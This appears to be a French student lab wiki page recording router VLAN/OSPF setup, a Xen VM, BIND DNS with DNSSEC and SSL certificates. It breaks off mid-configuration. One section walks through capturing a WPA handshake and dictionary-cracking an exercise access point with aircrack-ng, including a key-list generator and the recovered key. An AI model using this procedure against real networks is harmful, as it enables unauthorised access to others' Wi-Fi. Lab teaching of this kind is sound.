Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
